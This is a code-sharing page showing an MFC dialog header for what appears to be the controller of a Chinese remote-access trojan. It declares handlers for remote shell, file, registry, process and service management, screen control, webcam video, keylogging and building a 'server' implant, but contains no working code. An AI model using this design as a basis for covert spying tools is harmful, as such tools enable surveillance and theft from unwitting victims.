MyClientDlg.h
资源名称:Visualhk.rar [点击查看]
上传用户:cjw5120
上传日期:2022-05-11
资源大小:5032k
文件大小:2k
源码类别:
网络截获/分析
开发平台:
Visual C++
- // MyClientDlg.h : header file
- //
- #if !defined(AFX_MYCLIENTDLG_H__CDD86445_3C71_45FF_8AB8_17EF67884A63__INCLUDED_)
- #define AFX_MYCLIENTDLG_H__CDD86445_3C71_45FF_8AB8_17EF67884A63__INCLUDED_
- #if _MSC_VER > 1000
- #pragma once
- #endif // _MSC_VER > 1000
- //#include <vector>
- //#include "NL_QQwry.h"
- #include "TrayIcon.h"
- /////////////////////////////////////////////////////////////////////////////
- // CMyClientDlg dialog
- /*
- 作者:海啸 lyyer English Name: Jack
- blog:http://lyyer.blog.sohu.com
- website:http://www.cnGSG.com
- 海啸网络安全组织
- */
- class CMyClientDlg : public CDialog
- {
- // Construction
- public:
- LRESULT OnTrayNotification(WPARAM wParam,LPARAM lParam);
- CTrayIcon m_TrayIcon;
- CMyClientDlg(CWnd* pParent = NULL); // standard constructor
- //LRESULT OnTrayNotification(WPARAM wParam,LPARAM lParam);
- // Dialog Data
- //{{AFX_DATA(CMyClientDlg)
- enum { IDD = IDD_MYCLIENT_DIALOG };
- CButton m_btn_stop;
- CButton m_btn_start;
- CListCtrl m_list;
- //
- //}}AFX_DATA
- // ClassWizard generated virtual function overrides
- //{{AFX_VIRTUAL(CMyClientDlg)
- public:
- virtual BOOL DestroyWindow();
- protected:
- virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV support
- //}}AFX_VIRTUAL
- // Implementation
- protected:
- afx_msg void OnContextMenu(CWnd*, CPoint point);
- HICON m_hIcon;
- // Generated message map functions
- //{{AFX_MSG(CMyClientDlg)
- virtual BOOL OnInitDialog();
- afx_msg void OnPaint();
- afx_msg HCURSOR OnQueryDragIcon();
- afx_msg void OnButtonStart();
- afx_msg void OnClickList(NMHDR* pNMHDR, LRESULT* pResult);
- afx_msg void OnManageProcinfo();
- afx_msg void OnButtonStop();
- afx_msg void OnManageService();
- afx_msg void OnManageFile();
- afx_msg void OnManageReg();
- afx_msg void OnManageShell();
- afx_msg void OnManageControl();
- afx_msg void OnSize(UINT nType, int cx, int cy);
- afx_msg void OnMenuiteShow();
- afx_msg void OnMenuitemQuit();
- afx_msg void OnManageVideo();
- afx_msg void OnManageKeylog();
- afx_msg void OnClose();
- afx_msg void OnMakeServer();
- //}}AFX_MSG
- DECLARE_MESSAGE_MAP()
- };
- //{{AFX_INSERT_LOCATION}}
- // Microsoft Visual C++ will insert additional declarations immediately before the previous line.
- #endif // !defined(AFX_MYCLIENTDLG_H__CDD86445_3C71_45FF_8AB8_17EF67884A63__INCLUDED_)